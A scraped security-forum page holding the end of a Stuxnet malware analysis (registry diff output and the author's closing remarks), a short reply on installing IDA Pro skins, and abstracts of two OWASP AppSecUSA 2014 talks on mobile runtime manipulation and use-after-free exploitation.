HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\NodeSlot: 0x00000022
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0\MRUListEx: FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "Documents"
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Mode: 0x00000006
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).x: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ScrollPos1280x720(1).y: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Sort: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\SortDir: 0x00000001
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Col: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ColInfo: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FD DF DF FD 0F 00 06 00 28 00 10 00 34 00 48 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 B4 00 60 00 78 00 78 00 B4 00 B4 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).x: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MinPos1280x720(1).y: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).x: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\MaxPos1280x720(1).y: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).left: 0x000000CB
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).top: 0x00000034
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).right: 0x000003EB
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).bottom: 0x0000028C
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Rev: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WFlags: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ShowCmd: 0x00000001
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FFlags: 0x00000001
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\HotKey: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Buttons: 0xFFFFFFFF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Links: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Address: 0x00000000
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Vid: "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\MW\Lots of Stuxnet\snmw\malware.exe: "malware"
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\WinRAR\Interface\ShowPassword: 0x00000000

----------------------------------
Values modified: 17
----------------------------------
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 5B 70 29 6B 9F F8 6B 2E 27 BB 05 43 02 B3 42 43 88 7C 39 EA 7C 8F C3 C1 DA 61 6A 7A 3D A9 27 BB 06 12 F2 A2 B5 89 09 83 C9 CE 03 F8 7F 6C 1E 79 D9 10 7D F0 29 05 03 B9 29 88 8C EC E2 3C CB 04 12 E3 E3 EC 8F E6 27 0A 15 A9 09 6C 29 34 89 55
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 53 06 23 D9 FE 36 71 5D D7 02 23 98 92 D3 0C AA 52 45 17 A4 D9 2B 2E E6 C7 C1 12 FE D2 A0 E1 8A 5F CF 23 E0 9B 16 74 7E DC 38 BF 7E D6 F0 9F 97 9A 5B C8 12 7C C2 9E CE EF 95 DE D1 60 56 23 7A 21 96 9C 23 E4 CF D9 77 67 97 F4 EA F1 0D 25 18
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: 81 9C 54 0E 05 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: E3 F3 7F 0E 04 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 79 00 00 00 E0 8D E6 42 90 93 CA 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 77 00 00 00 A0 EC DC 76 81 FE CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 04 00 00 00 0B 00 00 00 00 54 07 85 81 FE CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 01 00 00 00 0B 00 00 00 60 F6 98 73 27 F4 CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4C 00 00 00 F0 8C 4C 41 90 93 CA 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4A 00 00 00 90 73 55 73 81 FE CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 08 00 00 00 E0 8D E6 42 90 93 CA 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 07 00 00 00 50 F6 45 98 7E FE CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 D1 6E 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 D1 6E 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 00 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A 00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32 00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6C 45 E5 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 15 00 00 00 7E 01 00 00 00 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 84 6C 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 84 6C 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 00 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A 00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32 00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6A 45 F3 1E 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 AB 00 00 00 02 00 00 00 00 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 07 00 00 00 06 00 00 00 08 00 00 00 02 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 08 00 00 00 06 00 00 00 02 00 00 00 07 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 00 00 00 00 01 00 00 00 FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 23 70 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 23 70 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 E9 6C 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 E9 6C 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x00000049
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x0000002C
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x00000057
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x0000003A
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x00000369
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x0000034C HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x000002AF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x00000292 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000002 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000001 ---------------------------------- Total changes: 150 ---------------------------------- 23 deleted keys, 110 values deleted, 17 values modified. Total = 150 changes. Overall, there's a lot to this rootkit. I didn't go into the MRxCls configuration file decryption, network changes/attack methods, other methods of zero-day flaws, etc but even so you can see that this is a pretty sophisticated piece of malware. However, as we now see, its biggest downfall was its complete lack of protection. The only personal explanation I have for this is that the creator(s) were either rushed to get it done by 'x' timeframe, so they focused on main code more than obfuscation, or they just imagined it wouldn't ever escape its original intended environment, so they'd never have to worry about reverse engineering being an issue. References Stuxnet Under the Microscope. Analyzing a Stuxnet Infection with the Sysinternals Tools. Posted by Patrick Barker at 2:58 PM Sursa: Debugging and reverse engineering: Stuxnet - User/Kernel-Mode analysis
-
I don't know what you downloaded. Download this: https://github.com/athre0z/ida-skins/releases/tag/v1.3.0 (release)
And put:
- what is in /plugins into /plugins
- the /skin folder into the main IDA folder (where /plugins is too)
Result: http://i.imgur.com/eWuQArb.png
-
[h=1]Runtime Manipulation of Android and iOS Applications - OWASP AppSecUSA 2014[/h] Published on 30 Sept. 2014 Recorded at AppSecUSA 2014 in Denver AppSec USA 2014 - AppSec USA 2014 Thursday, September 18 • 2:00pm - 2:45pm Runtime Manipulation of Android and iOS Applications With over 1.6 million applications in the Apple AppStore and Google Play store, and around 7 billion mobile subscribers in the world, mobile application security has been shoved into the forefront of many organizations. Mobile application security encompasses many facets of security. Device security, application security, and network security all play an important role in the overall security posture of a mobile application. Part of being a pen tester of mobile applications is understanding how each of the security controls work and how they interact. One powerful way to test the security and controls of our applications is to utilize runtime analysis and manipulation. Many tools exist to manipulate how an application works, both iOS and Android. This hands-on skills course will help students learn how to improve their mobile security toolbox. The skills course will utilize tools such as cycript, snoop-it, jdb, etc. for runtime manipulation and memory analysis. After the course, students will be able to get better results from their mobile application security testing. Speakers Dan Amodio Principal Consultant, Aspect Security As a Principal Consultant, Dan manages and defines Aspect Security's line of Assessment Services, helping organizations quantify their security risks from design to implementation. He works with staff and clients to develop the team members and deliverables. David Lindner Managing Consultant and Global Practice Manager, Aspect Security David Lindner is a Managing Consultant and Global Practice Manager, Mobile Application Security Services at Aspect Security. 
David brings 15 years of IT experience including application development, network architecture design and support, IT security and consulting, and application security. David's focus has been in the mobile space including everything from mobile application penetration testing/code review, to analyzing MDM and BYOD solutions. - Managed by the official OWASP Media Project https://www.owasp.org/index.php/OWASP... Sursa:
-
[h=1]Use After Free Exploitation - OWASP AppSecUSA 2014[/h] Published on 30 Sept. 2014 Recorded at AppSecUSA 2014 in Denver AppSec USA 2014 - AppSec USA 2014 Thursday, September 18 • 10:30am - 11:15am Use After Free Exploitation Use After Free vulnerabilities are the cause of a large number of web browser and client-side compromises. Software bugs residing on the heap can be difficult to detect through standard debugging and QA. This presentation will first define the Use After Free vulnerability class, and then dive deep into detecting the bug in a debugger and weaponizing it into a working exploit against Internet Explorer. We will also cover the concept of memory leaks which can allow for a complete Address Space Layout Randomization (ASLR) bypass. Speakers Stephen Sims Consultant Stephen Sims is an industry expert with over 15 years of experience in information technology and security. 